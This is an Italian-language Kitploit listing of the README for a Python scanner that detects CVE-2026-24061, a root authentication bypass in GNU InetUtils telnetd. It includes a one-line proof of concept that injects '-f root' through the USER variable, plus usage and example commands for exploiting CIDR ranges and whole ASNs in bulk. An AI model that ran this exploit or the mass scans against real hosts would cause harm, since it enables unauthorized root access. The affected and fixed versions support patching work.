Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/madfxr/twenty-three-scanner
RicognizioneScanner di VulnerabilitàExploitRaccolta InformazioniSicurezza di RetePenetration Testing
GitHubmadfxr/twenty-three-scanner

Twenty-Three-Scanner

CVE-2026-24061 - Bypass dell'autenticazione remota in Telnetd di GNU InetUtils

Vedi Repository
46 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛰️ Twenty-Three Scanner

Uno scanner Potente, Veloce ed Elegante per rilevare servizi Telnetd vulnerabili affetti da CVE-2026-24061. Realizzato con la pura libreria standard di Python - zero dipendenze esterne richieste.

License: MIT Python 3.x Android Windows macOS Solaris FreeBSD Linux Offensive Security Ethical Hacking CVE-2026-24061 GNU InetUtils Telnetd


🔗 Indice dei Contenuti

  • ⚖️ Licenza
  • 🧩 Caratteristiche
  • ☣️ Dettagli della Vulnerabilità
    • ⚡ Stato del Servizio
    • 🧪 Prova di Concetto (PoC)
    • 💥 Versioni Vulnerabili
    • 🧵 Versioni Corrette
    • ⚔️ Vettore di Attacco
    • 🚨 Punteggio CVSS
  • 🛠️ Installazione
  • 📜 Utilizzo
  • 🎯 Esempi
  • ⚗️ Demo
  • 📖 Riferimenti

🧩 Caratteristiche

  • 🚀 Scansione ad Alte Prestazioni – Architettura Multi-Thread con Numero di Thread Configurabile.
  • 🌐 Input di Target Flessibile – Supporto per IP Singoli, Range CIDR, Ricerche ASN ed Elenchi Basati su File.
  • 📊 Avanzamento in Tempo Reale – Interfaccia Unicode Elegante con Barre di Avanzamento Live.
  • 🤖 Intelligence ASN – Recupero Automatico dei Prefissi dalle API RADB, BGPView e HackerTarget.
  • 🌍 Intelligence sulla Posizione Geografica – Recupero in Tempo Reale di ASN, Provider e Posizione dall'API ipapi.
  • 💾 Interruzione Sicura – Gestione di CTRL+C con Salvataggio Automatico dei Risultati.
  • 📝 Registrazione Dettagliata – Livelli di Verbosità Configurabili per il Debugging.
  • 🛡️ Scansione Sicura – Limiti Integrati per Prevenire Scansioni Massive Accidentali.
  • 🎨 Output Pulito – Tabelle Professionale con Bordi e Riepiloghi di Scansione.
  • 📦 Zero Dipendenze – Solo Libreria Standard Python 3.x.

☣️ Dettagli della Vulnerabilità

CVE-2026-24061 è una vulnerabilità critica di bypass dell'autenticazione in GNU InetUtils Telnetd che consente a attaccanti remoti non autenticati di ottenere accesso root sfruttando la gestione dell'opzione NEW-ENVIRON.


⚡ Stato del Servizio

La seguente è la configurazione del servizio Telnetd sul lato host di destinazione.

image


🧪 Prova di Concetto (PoC)

Ed ecco la Prova di Concetto (PoC) per questa vulnerabilità, che può essere eseguita manualmente dall'host dell'attaccante semplicemente eseguendo il comando USER="-f root" telnet -a <TARGET_HOST> 23.

image


💥 Versioni Vulnerabili

  • GNU InetUtils >=1.9.3 <=2.7.
  • Varie distribuzioni Linux embedded.
  • Dispositivi IoT con implementazioni Telnetd vulnerabili.

🧵 Versioni Corrette

  • GNU InetUtils >=2.8.

⚔️ Vettore di Attacco

La vulnerabilità sfrutta una validazione impropria della variabile d'ambiente USER nella negoziazione dell'opzione telnet NEW-ENVIRON (RFC 1572), consentendo agli attaccanti di iniettare valori dannosi come -f root per bypassare l'autenticazione.


🚨 Punteggio CVSS

9.8 (Critico) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.


🛠️ Installazione

root@kitploit:~
# Clone the Repository
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner

# Make Executable
sudo chmod +x twenty-three-scanner.py

# Run the Script
sudo python3 twenty-three-scanner.py -h

📜 Utilizzo

Il seguente è un manuale per lo strumento Twenty-Three Scanner che può essere utilizzato per rilevare la vulnerabilità CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass.

root@kitploit:~
usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
                                       [--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]

CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass

options:
  -h, --help            show this help message and exit

Target Options:
  -t TARGET, --target TARGET
                        target IP, CIDR, or comma-separated list (can be used multiple times)
  -f FILE, --file FILE  file containing targets (one per line, supports comments with #)
  -a ASN, --asn ASN     autonomous system number (e.g., AS10111 or 10111)

Scan Options:
  -p PORT, --port PORT  target port(s), comma-separated (default: 23)
  --threads N           number of concurrent threads (default: 50)
  --user-value VALUE    USER environment variable value for exploit (default: '-f root')

Timeout Options:
  --connect-timeout SEC
                        TCP connection timeout in seconds (default: 3.0)
  --read-timeout SEC    socket read timeout in seconds (default: 2.0)
  --id-timeout SEC      'id' command response timeout in seconds (default: 2.0)

Limit Options:
  --max-hosts-per-cidr N
                        maximum hosts to scan per CIDR block (default: 1024)
  --max-total-hosts N   maximum total hosts across all targets (default: 50000)
  --skip-large-networks
                        skip networks larger than /16 (avoids accidentally scanning huge ranges)

Output Options:
  -o FILE, --output FILE
                        save vulnerable hosts to file (format: IP:PORT)
  -v, --verbose         enable verbose debug logging

🎯 Esempi

Ed ecco alcuni esempi di come utilizzare il comando.

root@kitploit:~
  # Scan Single IP Address, and Single Port
  sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23

  # Scan Single IP Address, and Multiple Ports
  sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23,2323

  # Scan Multiple IP Addresses, and Single Port
  sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23

  # Scan Multiple Addresses, and Multiple Ports
  sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23,2323

  # Scan CIDR Range, and Single Port with Results
  sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23 -o results.txt

  # Scan CIDR Range, and Multiple Ports with Results
  sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23,2323 -o results.txt

  # Scan Single IP Address, Multiple Addresses, or CIDR Range from File, and Single Port with Custom Thread and Output 
  sudo python3 twenty-three-scanner.py -f targets.txt -p 23 --threads 100 -o output.txt

  # Scan Single IP Address, Multiple IP Addresss, or CIDR Range from File, and Multiple Ports with Custom Threads and Output 
  sudo python3 twenty-three-scanner.py -f targets.txt -p 23,2323 --threads 100 -o output.txt

  # Scan ASN and Single Port with Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 -p 23 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 -p 23 --threads 100

  # Scan ASN and Multiple Ports with Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 -p 23,2323 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 -p 23,2323 --threads 100

  # Scan ASN with Custom Limits and Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 --max-hosts-per-cidr 2048 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 --max-hosts-per-cidr 2048 --threads 100

⚗️ Demo

Scansione di un Singolo Indirizzo IP con Più Porte.

image

Scansione di Più Indirizzi IP con una Singola Porta.

image

Scansione di un Range CIDR con una Singola Porta.

image

Scansione di un ASN con Più Porte.

image

Scansione di un Singolo Indirizzo IP, Più Indirizzi, o Range CIDR da File, e una Singola Porta con Thread e Output Personalizzati.

image


📖 Riferimenti

  • Critical GNU InetUtils telnetd Flaw Lets Attackers Bypass Login and Gain Root Access
  • NVD - CVE-2026-24061
  • CVE Record: CVE-2026-24061
  • Inetutils - GNU network utilities
  • [SECURITY] [DLA 4453-1] inetutils security update
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnet
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • CVE-2026-24061 Telnet RCE Exploit - By SafeBreach Labs
Scarica lo strumento